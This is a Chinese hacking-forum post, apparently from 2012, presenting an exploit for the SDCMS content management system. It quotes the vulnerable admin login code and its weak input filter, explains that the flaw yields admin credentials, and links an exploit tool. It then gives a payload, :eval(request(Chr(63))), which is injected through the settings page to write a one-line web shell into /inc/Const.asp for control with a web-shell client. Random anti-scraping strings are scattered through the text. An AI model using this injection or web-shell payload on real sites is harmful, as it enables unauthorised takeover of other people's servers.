中国网络渗透测试联盟
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
[打印本页]
作者:
admin
时间:
2012-11-9 20:57
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
作者:T00LS 鬼哥
( _0 g) v& G; P9 r1 I" Z
漏洞文件:后台目录/index.asp
4 A, @. e+ n$ J$ G2 G
! `; Q6 Q* a9 M, L1 V i5 o9 Y
Sub Check
/ j7 U& ~2 n( Y" G
Dim username,password,code,getcode,Rs
- C5 a6 v5 N- ^
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
9 N8 b7 ^% ?- r# z
username=FilterText(Trim(Request.Form("username")),1)
1 K I; k% J" {- g4 i4 {8 ?
password=FilterText(Trim(Request.Form("password")),1)
" R _3 M; }6 n% n% F& f* X
code=Trim(Request.Form("yzm"))
$ y2 }# }6 u2 d
getcode=Session("SDCMSCode")
9 ?+ l! M9 N! s) ~0 X8 U$ b& G) Z
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
: U# p O+ {8 S4 v6 t N( i0 P W
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"
ied
1 Y5 p" @* W5 m; i6 j3 c
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"
ied
) O4 t8 B- k# F3 ]7 c) ^- O
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"
ied
, ~0 P( l$ w( V0 x+ P+ Y: y& X
IF username="" or password="" Then
& \- t+ g$ [% J- Z- Q
Echo "用户名或密码不能为空"
ied
# z' t- ]5 f8 C6 ]# g
Else
9 c# M/ l6 P# e; a% }1 R; n4 [
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
/ ]8 v ~) S) z9 y' ~/ p9 y
IF Rs.Eof Then
8 Q8 `5 F' j/ ~4 P+ S
AddLog username,GetIp,"登录失败",1
3 w+ Q/ G0 g% X. k, |% n( c" g. g
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
) n8 S/ k: p w8 a4 M- T4 e
Else
* \8 X0 I$ n) b: k4 u
Add_Cookies "sdcms_id",Rs(0)
; D3 `! }- Q9 g2 U; k0 d% b0 y
Add_Cookies "sdcms_name",username
0 U" |' @3 c. F2 Q0 W) u+ a9 h
Add_Cookies "sdcms_pwd",Rs(2)
9 {) r5 h; x8 n7 V p& Q
Add_Cookies "sdcms_admin",Rs(3)
0 E! `$ b* z4 \+ ~4 `: L8 K% F
Add_Cookies "sdcms_alllever",Rs(4)
6 i. x9 }- C9 J5 k" L
Add_Cookies "sdcms_infolever",Rs(5)
, E% _* d' K( C j, k0 C% s
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
f: I' K; p r
AddLog username,GetIp,"登录成功",1
! Z" ~0 b! O7 r% }* b
'自动删除30天前的Log记录
5 @( o8 _9 d% ]( N/ L; N
IF Sdcms_DataType Then
: `' S8 k8 d6 f) z* a, `
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
+ A: G6 h6 Z3 J- X4 w* O7 A; v
Else
6 Z: M" H: ` d0 Y5 @+ Q! Z+ ?3 T
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
" W: `6 ^/ v" {: j* m5 e
End IF
- `4 C! A- W& s) H9 |; f# b
Go("sdcms_index.asp")
6 X9 v( e G2 j3 X1 f, k3 R: c
End IF
- y- w6 j9 v. E0 `% C
Rs.Close
$ Y2 f+ i: |8 K; f# ~) `2 [5 K
Set Rs=Nothing
& `- Q" g0 E' P! j8 B( M3 p
End IF
( k/ e* T6 f( v8 J' U1 y% _4 a
End Sub
, w5 c$ C4 X# [. _/ L- D0 O8 |# s
3 X2 _+ y. Z5 Y
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
6 m% b1 K3 h1 Y' Z: D# L+ q
4 S4 [5 h; Z) u8 ]: E( W. Z" u
Function FilterText(ByVal t0,ByVal t1)
5 U3 E4 J- _5 J* o* O/ r
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
& o8 Y1 |* E3 m7 h$ z- B& `6 J
t0=Trim(t0)
$ k( P3 O4 H. y8 C8 `
Select Case t1
5 [, \ `8 O9 g! R, X( c @
Case "1"
) O, _( v: f! Y7 s" o$ Y9 \
t0=Replace(t0,Chr(32),"")
i9 i% [) j% D$ O- A: @, d
t0=Replace(t0,Chr(13),"")
9 k) @: X5 K! M" n5 e0 r: E
t0=Replace(t0,Chr(10)&Chr(10),"")
3 G9 s! Y. R# l" \# Z) n
t0=Replace(t0,Chr(10),"")
/ A8 Y: ?* u2 f0 ]9 ~& `
Case "2"
3 P/ e* K: B$ ] Y) W- }" }
t0=Replace(t0,Chr(8),"")'回格
T) H! h7 `5 A
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
0 @, Q0 d. H& w/ {5 j' ~# b) V1 X
t0=Replace(t0,Chr(10),"")'换行
) K' [( g. t* U6 h9 } a3 m0 H$ m
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
j5 o1 ]1 b% ^2 v
t0=Replace(t0,Chr(12),"")'换页
y1 v) k9 U: A; z: g& x
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
4 V$ d' B* a3 j( o- q. E) l: }2 A
t0=Replace(t0,Chr(22),"")
% D2 T' s6 I5 q4 M5 [' E. K
t0=Replace(t0,Chr(32),"")'空格 SPACE
; X* {1 Q% T H. P2 ^2 W. J
t0=Replace(t0,Chr(33),"")'!
6 ^1 R( V* p9 f) v& y, b' E
t0=Replace(t0,Chr(34),"")'"
3 ], X, }& S7 C$ i8 ~
t0=Replace(t0,Chr(35),"")'#
+ |" x# V* w8 o4 j, g2 ]% A8 h
t0=Replace(t0,Chr(36),"")'$
) z) u: Y( G7 n4 A
t0=Replace(t0,Chr(37),"")'%
0 A; Q6 ~1 }# [$ T/ M% N- Z$ F* M
t0=Replace(t0,Chr(38),"")'&
2 a, m, p+ p; U. i! @4 t. A
t0=Replace(t0,Chr(39),"")''
0 O! f- O& X7 P" i4 a; h
t0=Replace(t0,Chr(40),"")'(
% j* q: B- f+ Q: ^* x
t0=Replace(t0,Chr(41),"")')
. K2 D1 u7 i* X. v' U0 J4 y
t0=Replace(t0,Chr(42),"")'*
5 c2 C0 @; e! X, z! o& t& h
t0=Replace(t0,Chr(43),"")'+
' ]8 a& w$ C- t2 J8 ^
t0=Replace(t0,Chr(44),"")',
2 c( I: A( ~( J3 I& h; X$ L
t0=Replace(t0,Chr(45),"")'-
7 T7 N1 y# p# V4 l, m9 \+ Z/ E
t0=Replace(t0,Chr(46),"")'.
# E3 A: ~9 t2 }# v6 B2 ]4 u
t0=Replace(t0,Chr(47),"")'/
8 G% ^9 }( l4 F9 @/ ~
t0=Replace(t0,Chr(58),"")':
) i& K, M( |+ x2 y; e, h
t0=Replace(t0,Chr(59),"")';
' a. J, {6 T( c, I" z# H k
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
3 B7 G5 W! k4 G f
t0=Replace(t0,Chr(63),"")'?
$ [7 `: [$ N" P. t( }6 g, [7 s/ P0 s
t0=Replace(t0,Chr(64),"")'@
, O1 K9 o5 t& L6 e
t0=Replace(t0,Chr(91),"")'\
|: u; C1 Y! T4 t( S& P4 T" P
t0=Replace(t0,Chr(92),"")'\
% O/ w. N. R( u9 m2 g& N1 I3 C
t0=Replace(t0,Chr(93),"")']
: J) i5 ^2 n0 I2 |5 [/ {; @
t0=Replace(t0,Chr(94),"")'^
' P$ e' u8 r; T5 |* \
t0=Replace(t0,Chr(95),"")'_
* [# @& L. U+ x1 W/ [5 ?7 Z
t0=Replace(t0,Chr(96),"")'`
2 x8 Z7 |" k8 C9 f
t0=Replace(t0,Chr(123),"")'{
) U7 I- U$ C: b! ]
t0=Replace(t0,Chr(124),"")'|
9 P, ^8 m% T% [1 ]+ [
t0=Replace(t0,Chr(125),"")'}
8 t8 z& y9 Q3 u
t0=Replace(t0,Chr(126),"")'~
7 Y0 @5 T6 |9 \* ]
Case Else
) x" Z g. G5 H5 E! ]8 u, X
t0=Replace(t0, "&", "&")
- D5 L k. Q0 `5 i
t0=Replace(t0, "'", "'")
. i9 S; P; R* r+ v$ w
t0=Replace(t0, """", """)
8 m N- t7 y1 r( _0 w
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
( ] z9 H4 M) j; T, U% j! Z
End Select
! X, O- ?+ ^0 u; |6 i
IF Instr(Lcase(t0),"expression")>0 Then
) \' ]0 v8 t* L
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
& ?) P4 }; E6 T9 i h& o
End If
6 ?; m: S6 ~" ]9 d# b5 `
FilterText=t0
0 N7 }8 b3 [* [( n8 Q
End Function
0 B6 n1 B% y) r) Y, n9 i
6 k# M D$ J* a$ t3 R0 x5 s( o
看到没。直接参数是1 只过滤
7 _+ n0 O* S) M* ^6 V! Z2 }2 F- a
t0=Replace(t0,Chr(32)," ")
# y X% _& l2 D, F9 O; H
t0=Replace(t0,Chr(13),"")
. D1 H7 O1 @" I
t0=Replace(t0,Chr(10)&Chr(10),"
, p) F# e8 Q! d: p) I2 [% x
")
. ^9 n& P. ^. k/ p4 L' X* `
t0=Replace(t0,Chr(10),"
' }# f; w- s. J8 ?; M
")
6 g, `+ p O+ L
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
' C" W9 S3 x a3 a% a
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
& c5 |$ o, f. l5 ?
# W& R" O r1 Z4 Z
测试:
?: X# q' \8 D+ K
* l! M) a5 x" g3 b. R. Y* o& {
# @3 I: w5 Z6 o3 P( X
现在输入工具上验证码,然后点OK
3 i+ a; V6 c$ F v1 K
7 j& X# P: }; G" W
7 h6 x) q& @: I1 b
看到我们直接进入后台管理界面了,呵呵!
$ ~1 u8 O7 S- t |& r- ^
% c" S. T) ]: ]* O
2 [" {: Z* w$ `( K9 z: u
/ p: K9 j* s8 Y1 H: v+ U4 R0 j
这样直接进入后台了。。。。
% t5 S# s" {: v' x9 X/ Z% G* r2 c
3 ]2 M' R; B ?
3 A; g! y6 ~1 |. G
# ~1 N/ |. r$ Y7 w5 m5 k4 s
SDCMS提权:
6 ]- H9 M: J3 J: }
6 Y! Z+ x0 o# p6 \7 V0 `6 U, G
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
9 w2 N# [8 ?1 _# C! X2 ^( S6 C
+ j) f- R4 O$ z& |1 Q
! Y$ f+ z4 r" ^8 i
# L) J) r! N; }$ [ {7 o; ~$ e+ q
OK,现在用菜刀连接下!
9 w" U& E. y. k$ U
8 z5 G3 Q' c7 z3 g3 Y
4 u4 M" P, B) I7 H4 }0 E; E
# v9 O+ m1 d$ q- X
8 m& |! } m; a
. y, k [$ v1 y: c) g4 o5 ~
欢迎光临 中国网络渗透测试联盟 (http://cobjon.com/)
Powered by Discuz! X3.2
ied1 Y5 p" @* W5 m; i6 j3 cied) O4 t8 B- k# F3 ]7 c) ^- Oied, ~0 P( l$ w( V0 x+ P+ Y: y& Xied